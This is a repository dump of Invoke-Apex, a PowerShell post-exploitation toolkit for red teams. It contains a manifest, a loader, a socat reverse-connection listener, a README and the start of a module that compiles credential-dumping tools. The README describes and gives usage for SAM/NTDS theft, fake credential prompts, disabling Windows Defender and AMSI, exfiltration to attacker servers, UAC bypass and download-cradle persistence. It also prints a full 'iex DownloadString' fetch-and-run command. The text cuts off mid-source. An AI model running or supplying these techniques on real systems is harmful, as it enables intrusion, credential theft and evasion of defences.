├── Invoke-Apex.psd1 ├── Invoke-Apex.psm1 ├── LICENSE ├── Listener.sh ├── README.md ├── img ├── Invoke-Connect.png ├── Invoke-Creds.png ├── Invoke-DefenderTools.png ├── Invoke-Execute.png └── Invoke-MitreReference.png └── modules ├── Invoke-Apex.ps1 ├── Invoke-Compile.ps1 ├── Invoke-Connect.ps1 ├── Invoke-Creds.ps1 ├── Invoke-DefenderTools.ps1 ├── Invoke-Download.ps1 ├── Invoke-Execute.ps1 ├── Invoke-Exfil.ps1 ├── Invoke-GlassWireExceptions.ps1 ├── Invoke-MitreReference.ps1 ├── Invoke-Persistence.ps1 ├── Invoke-Privesc.ps1 ├── Invoke-Sysinfo.ps1 ├── Invoke-UACBypass.ps1 └── Invoke-Utility.ps1 /Invoke-Apex.psd1: -------------------------------------------------------------------------------- 1 | # 2 | # Module manifest for module 'Invoke-Apex' 3 | # 4 | # Generated by: Fabrizio Siciliano (@0rbz_) 5 | # 6 | # Generated on: 01/11/2019 7 | # 8 | 9 | @{ 10 | 11 | # Script module or binary module file associated with this manifest 12 | ModuleToProcess = 'Invoke-Apex.psm1' 13 | 14 | # Version number of this module. 15 | ModuleVersion = '1.0.3' 16 | 17 | # ID used to uniquely identify this module 18 | GUID = 'add2d77c-ffcf-4d41-a578-600f6184ba12' 19 | 20 | # Author of this module 21 | Author = 'Fabrizio Siciliano (@0rbz_)' 22 | 23 | # Company or vendor of this module 24 | CompanyName = '' 25 | 26 | # Copyright statement for this module 27 | Copyright = 'BSD 3-Clause' 28 | 29 | # Description of the functionality provided by this module 30 | Description = 'Invoke-Apex - PowerShell Post-Exploitation Toolkit' 31 | 32 | # Minimum version of the Windows PowerShell engine required by this module 33 | PowerShellVersion = '3.0' 34 | 35 | # Name of the Windows PowerShell host required by this module 36 | PowerShellHostName = '' 37 | 38 | # Minimum version of the Windows PowerShell host required by this module 39 | PowerShellHostVersion = '' 40 | 41 | # Minimum version of the .NET Framework required by this module 42 | DotNetFrameworkVersion = '' 43 | 44 | # Minimum version of the common language runtime (CLR) required by this module 45 | CLRVersion = '' 46 | 47 | # Processor architecture (None, X86, Amd64, IA64) required by this module 48 | ProcessorArchitecture = '' 49 | 50 | # Modules that must be imported into the global environment prior to importing this module 51 | RequiredModules = @() 52 | 53 | # Assemblies that must be loaded prior to importing this module 54 | RequiredAssemblies = @() 55 | 56 | # Script files (.ps1) that are run in the caller's environment prior to importing this module 57 | ScriptsToProcess = @() 58 | 59 | # Type files (.ps1xml) to be loaded when importing this module 60 | TypesToProcess = @() 61 | 62 | # Format files (.ps1xml) to be loaded when importing this module 63 | FormatsToProcess = @() 64 | 65 | # Modules to import as nested modules of the module specified in ModuleToProcess 66 | NestedModules = @() 67 | 68 | # Functions to export from this module 69 | FunctionsToExport = '*' 70 | 71 | # Cmdlets to export from this module 72 | CmdletsToExport = '*' 73 | 74 | # Variables to export from this module 75 | VariablesToExport = '*' 76 | 77 | # Aliases to export from this module 78 | AliasesToExport = '*' 79 | 80 | # List of all modules packaged with this module 81 | ModuleList = @() 82 | 83 | # List of all files packaged with this module 84 | FileList = @() 85 | 86 | # Private data to pass to the module specified in ModuleToProcess 87 | PrivateData = '' 88 | 89 | } 90 | -------------------------------------------------------------------------------- /Invoke-Apex.psm1: -------------------------------------------------------------------------------- 1 | <# 2 | .SYNOPSIS 3 | PowerShell Post-Exploitation Toolkit 4 | 5 | .LINK 6 | https://www.github.com/securemode/Invoke-Apex 7 | 8 | .EXAMPLE 9 | 10 | PS> Import-Module .\Invoke-Apex.psd1 11 | PS> Invoke-Apex 12 | 13 | Author: Fabrizio Siciliano (@0rbz_) 14 | 15 | #> 16 | 17 | Get-ChildItem -Path $PWD\modules\*.ps1 | Foreach-Object{ . $_.FullName } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2019, SecureMode 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /Listener.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | # requires socat 3 | 4 | if [[ $1 == "" ]]; then 5 | echo "Usage: $0 [PEM_FILE] [PORT]" 6 | echo "Example: $0 cert.pem 443" 7 | exit 1; 8 | fi 9 | 10 | PEM="$1" 11 | PORT="$2" 12 | SOCAT=$(which socat) 13 | 14 | printf "\n### aPeX Listener Help ### \n\n---> Type 'Invoke-Apex' at the aPeX Listener Prompt below and press [ENTER]\n---> Then launch an aPeX agent or Invoke-Connect from the target machine.\n---> CTRL-C to close the connection.\n" 15 | 16 | date=$(date) 17 | printf "\n$date \n[aPeX Listener Prompt]: " 18 | $SOCAT openssl-listen:$PORT,keepalive,method=TLS1,reuseaddr,cert=$PEM,verify=0 stdout 19 | 20 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Invoke-Apex 2 | 3 | ``` 4 | 8888888b. Y88b d88P 5 | 888 Y88b Y88b d88P 6 | 888 888 Y88o88P 7 | 8888b. 888 d88P .d88b. Y888P 8 | "88b 8888888P" d8P Y8b d888b 9 | .d888888 888 88888888 d88888b 10 | 888 888 888 Y8b. d88P Y88b 11 | "Y888888 888 "Y8888 d88P Y88b 12 | Y88b 13 | Post-Exploitation Toolkit Y88b 14 | By: Fabrizio Siciliano (@0rbz_) V1.0 15 | ``` 16 | 17 | ```Invoke-Apex``` is a PowerShell-based toolkit consisting of a collection of techniques and tradecraft for use in red team, post-exploitation, adversary simulation, or other offensive security tasks.  It can also be useful in identifying lapses in "malicious" activity detection processes for defenders as well. 18 | 19 | Each technique or method in the toolkit is mapped back to a [Mitre ATT&CK](https://attack.mitre.org/) Technique ID where applicable, and the techniques and modules which they can be found in, can be viewed with the ```Invoke-MitreReference -Help``` command. See the section "[The Mitre ATT&CK Reference Component](https://github.com/securemode/Invoke-Apex#the-mitre-attck-reference-component)" for more info! 20 | 21 | ```Invoke-Apex``` is a work-in-progress, so updates to modules, and additional capability can be expected somewhat regularly as time allows. 22 | 23 | ## General Usage 24 | 25 | ### Importing the Toolkit 26 | ```PS> Import-Module .\Invoke-Apex.psd1``` 27 | 28 | All individual "modules" (cmdlets) can of course also be dot-sourced into the current session: 29 | 30 | ```PS> . .\Invoke-DefenderTools.ps1``` 31 | 32 | Or can be invoked using a traditional ```DownloadString``` cradle, etc: 33 | 34 | ```C:\> powershell -ep bypass -nop -noni "iex (New-Object Net.Webclient).DownloadString('https://server/Invoke-DefenderTools.ps1'); Invoke-DefenderTools -GetExcludes"``` 35 | 36 | ### Listing all available functions 37 | ```PS> Invoke-Apex``` 38 | ``` 39 | PS> Invoke-Apex 40 | 41 | [*] Usage: [Function-Name] -Help (Shows Help for each command within a function) 42 | [*] Usage: [Function-Name] -List (Summary list of available commands within a function) 43 | 44 | [*] Example: Invoke-DefenderTools -Help 45 | [*] Example: Invoke-DefenderTools -List 46 | 47 | 48 | CommandType Name Version Source 49 | ----------- ---- ------- ------ 50 | Function Invoke-Apex 1.0 Invoke-Apex 51 | Function Invoke-Compile 1.0 Invoke-Apex 52 | Function Invoke-Connect 1.0 Invoke-Apex 53 | Function Invoke-Creds 1.0 Invoke-Apex 54 | Function Invoke-DefenderTools 1.0 Invoke-Apex 55 | Function Invoke-Download 1.0 Invoke-Apex 56 | Function Invoke-Execute 1.0 Invoke-Apex 57 | Function Invoke-Exfil 1.0 Invoke-Apex 58 | Function Invoke-GlasswireExceptions 1.0 Invoke-Apex 59 | Function Invoke-MitreReference 1.0 Invoke-Apex 60 | Function Invoke-Persistence 1.0 Invoke-Apex 61 | Function Invoke-Privesc 1.0 Invoke-Apex 62 | Function Invoke-Sysinfo 1.0 Invoke-Apex 63 | Function Invoke-UACBypass 1.0 Invoke-Apex 64 | Function Invoke-Utility 1.0 Invoke-Apex 65 | 66 | ``` 67 | ### Getting help for a function / listing function commands 68 | Each functions' available commands (or parameters) can be listed with the ```-Help``` parameter or with the ```-List``` parameter for a brief list of commands. 69 | 70 | ```PS> Invoke-DefenderTools -Help``` 71 | ``` 72 | PS> Invoke-DefenderTools -Help 73 | 74 | ### Invoke-DefenderTools Help ### 75 | --------------------------------- 76 | Available Invoke-DefenderTools Commands: 77 | ---------------------------------------- 78 | |----------------------------------------------------------------------| 79 | | -GetExcludes | 80 | |----------------------------------------------------------------------| 81 | 82 | [*] Description: Gets any current exclude files/paths/extensions 83 | currently configured in Windows Defender via the Registry. 84 | 85 | [*] Usage: Invoke-DefenderTools -GetExcludes 86 | 87 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 88 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 89 | 90 | |----------------------------------------------------------------------| 91 | | -AddExclude [-Path] path | 92 | |----------------------------------------------------------------------| 93 | 94 | [*] Description: Adds a path exclude to Windows Defender. 95 | (Requires Elevation) 96 | 97 | [*] Usage: Invoke-DefenderTools -AddExclude -Path C:\temp 98 | 99 | [*] Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 100 | [*] Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 101 | <...snip...> 102 | 103 | ``` 104 | 105 | ```PS> Invoke-DefenderTools -List``` 106 | 107 | ``` 108 | PS> Invoke-DefenderTools -List 109 | 110 | Invoke-DefenderTools Command List: 111 | ---------------------------------- 112 | Invoke-DefenderTools -GetExcludes 113 | Invoke-DefenderTools -AddExclude [-Path] path 114 | Invoke-DefenderTools -DisableRtm 115 | Invoke-DefenderTools -DisableAMSI 116 | ``` 117 | 118 | 119 | ### The Mitre ATT&CK Reference component 120 | 121 | ```PS> Invoke-MitreReference -Help``` 122 | ``` 123 | PS> Invoke-MitreReference -Help 124 | 125 | |------------------------------------------------------------------| 126 | | ### MITRE ATT&CK TECHNIQUE REFERENCE ### | 127 | |------------------------------------------------------------------| 128 | 129 | <...snip...> 130 | 131 | Module: Invoke-Creds 132 | -------------------- 133 | Mitre ATT&CK Ref: T1056 (Input Capture) 134 | Mitre ATT&CK Ref: T1081 (Credentials in Files) 135 | Mitre ATT&CK Ref: T1003 (Credential Dumping) 136 | 137 | 138 | Module: Invoke-DefenderTools 139 | ---------------------------- 140 | Mitre ATT&CK Ref: T1211 (Exploitation for Defense Evasion) 141 | Mitre ATT&CK Ref: T1089 (Disabling Security Tools) 142 | 143 | 144 | Module: Invoke-Download 145 | ----------------------- 146 | Mitre ATT&CK Ref: T1105 (Remote File Copy) 147 | 148 | 149 | Module: Invoke-Execute 150 | ---------------------- 151 | Mitre ATT&CK Ref: T1086 (PowerShell) 152 | Mitre ATT&CK Ref: T1085 (Rundll32) 153 | Mitre ATT&CK Ref: T1047 (Windows Management Instrumentation) 154 | Mitre ATT&CK Ref: T1220 (XSL Script Processing) 155 | Mitre ATT&CK Ref: T1028 (Windows Remote Management) 156 | Mitre ATT&CK Ref: T1218 (Signed Binary Proxy Execution) 157 | 158 | <...snip...> 159 | ``` 160 | 161 | You can also lookup which [Mitre ATT&CK](https://attack.mitre.org/) techniques are in use, and in which modules with the ```-Tid``` parameter and specifying a Mitre ATT&CK Technique ID as a value: 162 | 163 | ```PS> Invoke-MitreReference -Tid 1352``` 164 | ``` 165 | PS> Invoke-MitreReference -Tid 1352 166 | 167 | Modules using Mitre ATT&CK Ref: T1352 (C2 Protocol Development): 168 | 169 | [+] Module: Invoke-Connect 170 | 171 | ``` 172 | 173 | # Available Functions / Commands 174 | 175 | ## Invoke-Apex 176 | ```Invoke-Apex``` (Lists all available functions) 177 | 178 | ## Invoke-Compile 179 | Compiles some of Apex's functionality to .NET Assemblies. 180 | 181 | #### Available Commands: 182 | 183 | ```-CopySAM``` (Invoke-Creds -CopySAM functionality compiled as a .NET Assembly.) 184 | 185 | ```-WiFiCreds``` (Invoke-Creds -WiFiCreds functionality compiled as a .NET Assembly.) 186 | 187 | ```-SysInfo``` (Compiles a .NET Aseembly that Dumps everything from the "Invoke-Sysinfo" function.) 188 | 189 | ## Invoke-Connect 190 | Transfers all Apex functionality to a remote SSL listener, and also functions as a non-interactive powershell reverse "shell" if invoked as a stand-alone cmdlet. (SSL-enabled listener is required) 191 | 192 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Connect.png) 193 | 194 | Usage: ```PS> Invoke-Connect -ListenerIp 192.168.1.1 -ListenerPort 443``` 195 | 196 | ## Invoke-Creds 197 | Several commands to assist in obtaining credentials from the target host. 198 | 199 | #### Available Commands: 200 | 201 | ```-WiFiCreds``` (Dumps saved Wireless Credentials) 202 | 203 | ```-IeCreds``` (Dumps saved IE credentials) 204 | 205 | ```-AuthPrompt``` (Invokes an authentication prompt to the target and captures any entered credentials) 206 | 207 | ```-PuttyKeys``` (Dumps any saved putty sessions/keys/passwords) 208 | 209 | ```-CopySAM``` (Utilizes Volume Shadow Copy to copy the SAM, SYSTEM and SECURITY files for offline parsing.) 210 | 211 | ```-CopyNtds``` (Utilizes Volume Shadow Copy to copy the NTDS.dit and SYSTEM files for offline parsing.) 212 | 213 | 214 | 215 | ## Invoke-DefenderTools 216 | Several commands to assist in interacting with Windows Defender. 217 | #### Available Commands: 218 | 219 | ```-GetExcludes``` (Gets any currently excluded files/paths/extensions from Windows Defender via the Registry) 220 | 221 | ```-AddExclude``` (Adds a Windows Defender exclude path. Requires elevation.) 222 | 223 | ```-DisableRtm``` (Disables Windows Defender Real-Time Monitoring. Requires elevation.) 224 | 225 | ```-DisableAmsi``` (Disables AMSI for a new PowerShell session.) 226 | 227 | ## Invoke-Download 228 | Commands for downloading files to the target system. 229 | #### Available Commands: 230 | 231 | ```-PsDownload``` (Downloads a file to the target system using a traditional powershell 'DownloadFile' cradle.) 232 | 233 | ```-CertUtil``` (Uses certutil.exe to download a file to the target system. Uses the "VerifyCTL" method.) 234 | 235 | ```-EsentUtl``` (Uses Esentutil.exe to download a file from a remote UNC Path.) 236 | 237 | ## Invoke-Execute 238 | Execute commands on a target system using a number of different "living-off-the-land" techniques. 239 | #### Available Commands: 240 | 241 | ```-DownloadString``` (Executes a remote powershell script in memory using the "DownloadString" method.) 242 | 243 | ```-XmlHTTP``` (Executes a remote powershell script in memory using Msxml2.XMLHTTP COM Object.) 244 | 245 | ```-RunDLL``` (Executes system commands or arbitrary code using a number of different "rundll32" methods.) 246 | 247 | Available ```Invoke-Execute -Rundll``` methods: 248 | 249 | ``` 250 | [1] shell32.dll,Control_RunDLL 251 | [2] shell32.dll,Control_RunDLLA 252 | [3] IEAdvpack.dll,RegisterOCX 253 | [4] zipfldr.dll,RouteTheCall 254 | [5] advpack.dll,RegisterOCX 255 | [6] pcwutl.dll,LaunchApplication 256 | ``` 257 | 258 | 259 | ```-WmicExec``` (Executes a local command via "wmic process call create".) 260 | 261 | ```-WmicXsl``` (Utilizes "wmic process get brief" to execute a built-in XSL stylesheet containing JScript ActiveXObject command.) 262 | 263 | ```-OdbcExec``` (Uses odbcconf.exe to execute a local DLL or DLL at a UNC path.) 264 | 265 | ```-WinRmWmi``` (Executes a command from a built-in XML file via winrm.vbs.) 266 | 267 | ```-SignedProxyDll``` (Executes a DLL via an existing signed binary.) 268 | 269 | Available ```Invoke-Execute -SignedProxyDll``` methods: 270 | 271 | ``` 272 | [1] AdobeARM.exe 273 | ``` 274 | 275 | ```-SignedProxyExe``` (Executes an EXE via an existing signed binary.) 276 | 277 | Available ```Invoke-Execute -SignedProxyExe``` methods: 278 | 279 | ``` 280 | [1] pcalua.exe 281 | [2] SynTPEnh.exe 282 | ``` 283 | 284 | ## Invoke-Exfil 285 | Allows for moving files off of a target system to a remote system. 286 | #### Available Commands: 287 | ```-SmbExfil``` (Copies a local file over SMB to a remote SMB Server/Share.) 288 | 289 | ```-RestExfil``` (Uses PowerShell's ```Invoke-RestMethod``` and "POST" to Base64 encode and send a file to an attacker-controlled web server.) 290 | 291 | ```-TransferShExfil``` (Uploads a file to the https://transfer.sh file upload service. A URL to the file will be returned and is valid for 14 days. "Invoke-WebRequest" and PUT is utilized for this function.) 292 | 293 | ```-InstallScpClient``` (Installs Windows SSH and SCP clients via a Windows capability package using the Add-WindowsCapability cmdlet and will spawn dismhost.exe as a child-process of powershell. If PowerShell is detected as version 2.0, it will install it with dism.exe. Both options require elevation.) 294 | 295 | 296 | ## Invoke-GlassWireExceptions 297 | Dumps any program exceptions configured in GlassWire Endpoint Protection software. 298 | 299 | Usage: ```PS> Invoke-GlassWireExceptions``` 300 | 301 | ## Invoke-MitreReference 302 | 303 | (Each technique or method in the toolkit is mapped back to a [Mitre ATT&CK](https://attack.mitre.org/) Technique ID where applicable, and the techniques and modules which they can be found in, can be viewed with the ```Invoke-MitreReference -Help``` command. This cmdlet can also be used to search for specific MITRE ATT&CK Technique ID's with the ```-Tid``` parameter.) 304 | 305 | Usage: 306 | 307 | ```PS> Invoke-MitreReference -Help``` 308 | 309 | ```PS> Invoke-MitreReference -Tid 1055``` 310 | 311 | 312 | ## Invoke-Persistence 313 | Several methods that allow persisting on a target system. 314 | #### Available Commands: 315 | ```-StartupLnk``` (Drops a .LNK file in the current user's startup directory that executes a remotely hosted PowerShell script in memory using the "DownloadString" method. If the ```-Encoded``` parameter is appended to the command line, the downloadstring will be encoded and will use PowerShell's ```-EncodedCommand``` function to execute.) 316 | 317 | ```-Adduser``` (Adds a local user. If the ```-Admin``` parameter is specified, adds an existing user to the local Administrators group.) 318 | 319 | ```-EnableRdp``` (Enables remote desktop on the target, and adds an existing user to the Remote Desktop users group.) 320 | 321 | ```-PsTask``` (Generates a scheduled task that utilizes Net.Webclient Downloadstring method to a remote PowerShell script.) 322 | 323 | ## Invoke-PrivEsc 324 | Commands for either elevating to a higher integrity-level or elevating privileges via other means. 325 | #### Available Commands: 326 | 327 | ```-UnquotedPaths``` (Checks for auto start services configured without quotes, useful for identifying services vulnerable to unquoted service paths exploitation.) 328 | 329 | ## Invoke-Sysinfo 330 | Gathers information about a system. 331 | #### Available Commands: 332 | ```-Os``` (Displays Basic Operating System Information) 333 | 334 | ```-Env``` (Displays Environment Variables Information) 335 | 336 | ```-Arch``` (Displays system architecture) 337 | 338 | ```-Drives``` (Displays current drives) 339 | 340 | ```-Users``` (Displays Users) 341 | 342 | ```-LocalAdmins``` (Displays local admins) 343 | 344 | ```-DomainAdmins``` (Displays Domain Admins) 345 | 346 | ```-Privs``` (Displays current user privileges) 347 | 348 | ```-HotFixes``` (Displays installed hotfixes) 349 | 350 | ```-CheckElevated``` (Checks if current user PS process is elevated) 351 | 352 | ```-Shares``` (Displays shared drives on the system) 353 | 354 | ```-LoggedOn``` (Displays currently interactively logged-on users) 355 | 356 | ```-Apps``` (Retrieves installed applications) 357 | 358 | ```-Procs``` (Displays current running processes) 359 | 360 | ```-Services``` (Displays current running and stopped services) 361 | 362 | ```-Tasks``` (Displays non-Microsoft scheduled tasks) 363 | 364 | ```-Av``` (Retrieves installed AntiVirus software information) 365 | 366 | ```-LangMode``` (Checks powershell current language mode) 367 | 368 | ```-PsVersion``` (Displays PowerShell version) 369 | 370 | ```-DnsCache``` (Dumps DNS Cache) 371 | 372 | ```-PsHistory``` (Dumps PowerShell Commandline History) 373 | 374 | ```-ClipBoard``` (Dumps Clipboard Contents) 375 | 376 | ```-RecentDocs``` (Dumps recently accessed documents) 377 | 378 | ```-IpConfig``` (Displays Network Interfaces information) 379 | 380 | ```-NetStat``` (Displays Active Network Connections Information) 381 | 382 | ```-DumpAll``` (Dumps all of the above modules information into %appdata%\sysinfo.txt) 383 | 384 | ## Invoke-UACBypass 385 | 386 | #### Available Commands: 387 | 388 | ```-MMCCom``` (Downloads a remotely hosted DLL payload and executes a UAC bypass using CLSID 0A29FF9E-7F9C-4437-8B11-F424491E3931 "InProcServer"Event Viewer (mmc.exe) Method. Requires Admin User with UAC set to "Default". Tested on Win 10.0.16299) 389 | 390 | ## Invoke-Utility 391 | 392 | Miscellaneous Utilities 393 | 394 | #### Available Commands: 395 | 396 | ```-TcpScan``` (Simple TCP Port Scanner.) 397 | 398 | Note: This is a SLOW scanner, one probe every second. The slow scanning is intentional as it helps to evade things like Symantec's Endpoint Protection firewall. The idea behind this is to generate as little noise as possible. 399 | 400 | ```-TimeStomp``` (Modifies a files' Creation Time to that of C:\windows\system32\cmd.exe. The 'TimeOf' parameter can be used to change the timestamp to match that of some other file.) 401 | 402 | 403 | ```-FindFile``` (Search for a file.) 404 | 405 | # Usage Screenshots 406 | 407 | ## Invoke-Creds 408 | 409 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Creds.png) 410 | 411 | ## Invoke-DefenderTools 412 | 413 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-DefenderTools.png) 414 | 415 | ## Invoke-Execute 416 | 417 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-Execute.png) 418 | 419 | ## Invoke-MitreReference 420 | 421 | ![screenshot](https://raw.githubusercontent.com/securemode/Invoke-Apex/master/img/Invoke-MitreReference.png) 422 | 423 | 424 | # DISCLAIMER 425 | THIS SOFTWARE IS PROVIDED 'AS IS' AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /img/Invoke-Connect.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Connect.png -------------------------------------------------------------------------------- /img/Invoke-Creds.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Creds.png -------------------------------------------------------------------------------- /img/Invoke-DefenderTools.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-DefenderTools.png -------------------------------------------------------------------------------- /img/Invoke-Execute.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-Execute.png -------------------------------------------------------------------------------- /img/Invoke-MitreReference.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/password-reset/Invoke-Apex/81bfc10f3d8fef5f93c8809bd4f793cc8e0e196a/img/Invoke-MitreReference.png -------------------------------------------------------------------------------- /modules/Invoke-Apex.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Apex { 2 | 3 | Write @" 4 | 5 | 6 | 8888888b. Y88b d88P 7 | 888 Y88b Y88b d88P 8 | 888 888 Y88o88P 9 | 8888b. 888 d88P .d88b. Y888P 10 | "88b 8888888P" d8P Y8b d888b 11 | .d888888 888 88888888 d88888b 12 | 888 888 888 Y8b. d88P Y88b 13 | "Y888888 888 "Y8888 d88P Y88b 14 | Y88b 15 | A Post-EXploitation toolkit Y88b 16 | By: Fabrizio Siciliano (@0rbz_) V1.0.3 17 | 18 | [*] Usage: [Function-Name] -Help (Shows Help for each command within a function) 19 | [*] Usage: [Function-Name] -List (Summary list of available commands within a function) 20 | 21 | [*] Example: Invoke-DefenderTools -Help 22 | [*] Example: Invoke-DefenderTools -List 23 | 24 | "@ 25 | 26 | (Get-Command -Module Invoke-Apex).Name 27 | $modnum = (get-childitem -Path modules\).count 28 | Write-Output "`nLoaded Modules: $modnum`n" 29 | } -------------------------------------------------------------------------------- /modules/Invoke-Compile.ps1: -------------------------------------------------------------------------------- 1 | function Invoke-Compile { 2 | <# 3 | 4 | .SYNOPSIS 5 | 6 | Compiles some of Apex's functionality to .NET Assemblies. Executables will be written to $env:temp. 7 | 8 | .PARAMETER Help 9 | Displays Help 10 | 11 | .PARAMETER List 12 | 13 | Displays summary usage. 14 | 15 | .PARAMETER CopySAM 16 | 17 | Compiles a .NET Assembly that can be used to copy the SAM, SYSTEM and SECURITY files for offline parsing and cracking. 18 | 19 | .PARAMETER WiFiCreds 20 | 21 | Compiles a .NET Assembly that can be used to dump saved wireless credentials. 22 | 23 | .PARAMETER SysInfo 24 | 25 | Compiles a .NET Assembly that gathers information about the system. Will drop a "SysInfo.exe" in $env:temp. When executed, will write results to C:\windows\temp\SysInfo.txt. 26 | 27 | .EXAMPLE 28 | 29 | Compile: 30 | PS> Invoke-Compile -CopySAM 31 | 32 | Execute: 33 | C:\CopySAM.exe 34 | 35 | Compile: 36 | PS> Invoke-Compile -SysInfo 37 | 38 | Execute: 39 | C:\windows\temp\SysInfo.exe 40 | 41 | .NOTES 42 | 43 | Author: Fabrizio Siciliano (@0rbz_) 44 | 45 | #> 46 | 47 | [CmdletBinding()] 48 | param ( 49 | [Parameter(Position=1)] 50 | [Switch]$Help, 51 | [Switch]$List, 52 | 53 | [Parameter(Mandatory = $False)] 54 | [Switch]$CopySAM, 55 | 56 | [Parameter(Mandatory = $False)] 57 | [Switch]$WiFiCreds, 58 | 59 | [Parameter(Mandatory = $False)] 60 | [Switch]$SysInfo 61 | 62 | 63 | ) 64 | 65 | $X = (-join ((65..90) + (97..122) | Get-Random -Count 11 | foreach {[char]$_})) 66 | $Z = (-join ((65..90) + (97..122) | Get-Random -Count 5 | foreach {[char]$_})) 67 | $FWDir = $([System.Runtime.InteropServices.RuntimeEnvironment]::GetRuntimeDirectory()) 68 | $SmaDll = [PSObject].Assembly.Location 69 | $CsFile = "$env:temp\$Z.cs" 70 | $Compiler = "$FWDir" + "c?c.??e" 71 | 72 | 73 | if ($Help -eq $True) { 74 | Write @" 75 | 76 | ### Invoke-Compile Help ### 77 | --------------------------- 78 | Available Invoke-Compile Commands: 79 | ---------------------------------- 80 | 81 | |---------------------------------------------------------------------| 82 | | -CopySAM | 83 | |---------------------------------------------------------------------| 84 | 85 | [*] Description: Invoke-Creds -CopySAM functionality compiled as a 86 | .NET Assembly. 87 | 88 | Tested on Win 10 / .NET CLRVersion 4.0.30319.42000 89 | 90 | The resulting CopySAM.exe assembly requires admin rights to work. 91 | 92 | [*] Usage: Invoke-Compile -CopySam 93 | 94 | [*] Mitre ATT&CK Ref: T1003 (Credential Dumping) 95 | 96 | |---------------------------------------------------------------------| 97 | | -WiFiCreds | 98 | |---------------------------------------------------------------------| 99 | 100 | [*] Description: Invoke-Creds -WifiCreds functionality compiled as a 101 | .NET Assembly. 102 | 103 | Tested on Win 10 / .NET CLRVersion 4.0.30319.42000 104 | 105 | [*] Usage: Invoke-Compile -WiFiCreds 106 | 107 | [*] Mitre ATT&CK Ref: T1081 (Credentials in Files) 108 | 109 | |---------------------------------------------------------------------| 110 | | -SysInfo | 111 | |---------------------------------------------------------------------| 112 | 113 | [*] Description: Compiles a .NET Assembly that gathers information 114 | about the system. Will drop a "SysInfo.exe" in C:\windows\temp. 115 | When executed, will write results to $env:temp\SysInfo.txt. 116 | 117 | [*] Usage: Invoke-Compile -SysInfo 118 | 119 | \---------------------------------------------------------------------/ 120 | 121 | "@ 122 | } 123 | elseif ($List -eq $True) { 124 | Write @" 125 | 126 | Invoke-Compile Brief Command Usage: 127 | ----------------------------------- 128 | Invoke-Compile -CopySAM 129 | Invoke-Compile -WiFiCreds 130 | Invoke-Compile -SysInfo 131 | 132 | "@ 133 | } 134 | elseif ($CopySAM) { 135 | 136 | $CompilerArgs = "/r:$SmaDll /t:exe /out:$env:temp\CopySAM.exe $CsFile" 137 | 138 | $Source = @" 139 | using System.Collections.ObjectModel; 140 | using 